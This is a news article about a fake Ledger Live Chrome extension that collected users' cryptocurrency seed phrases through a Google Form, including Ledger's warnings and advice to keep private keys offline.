Ledger, the popular cryptocurrency wallet maker, has warned users of a fake Ledger Live Chrome extension which can lead to wallet contents being stolen. The extension, which has since been taken offline, sought to steal wallet information from unsuspecting users, and is another warning of exactly what wallet information should remain private.
A fake Chrome extension has been found, asking to enter your 24 word recover phrase
⚠️NEVER share your 24 words
⚠️NEVER enter your 24 words into any internet-connected device
⚠️Ledger will NEVER ask for your 24 words
— Ledger Support (@Ledger_Support) March 5, 2020
Extension Collected Private Keys
The exploit was reported by ZDNet on Thursday, who said that the extension, specifically named after Ledger’s genuine Ledger Live software, was being heavily advertised on Google via search ads.
ZDNet say that the malware was discovered by Harry Denley, Director of Security at the MyCrypto platform, who noticed that a Chrome extension of the software was being advertised, but in reality was simply a popup that collected the unwitting user’s Ledger seed phrase and published it to a Google Form.
The attacker could then very easily use these details to access the user’s account and rinse their wallet of funds.
Crypto’s “Big Problem”
Denley further expressed his concern that people still didn’t understand the importance of keeping their private keys offline:
The extension makes no sense to install and use because it defeats the purpose of having a hardware wallet with your secrets offline. But I would not be surprised if it has got people to input their secrets. It’s a big problem in the cryptocurrency area, to teach people their private keys/mnemonics should stay offline.
The extension, which had over 120 downloads at the time of its discovery, has now been taken down by Google, but it is not known how many actually fell victim to the scam.
Private Keys Are For Your Eyes Only
This incident shows that sometimes, even apps in official stores cannot sometimes be trusted, which is why it is always an idea to follow links provided by official sources only, rather than just following a Google search result or searching within an app store.
And never, EVER, give out your private key.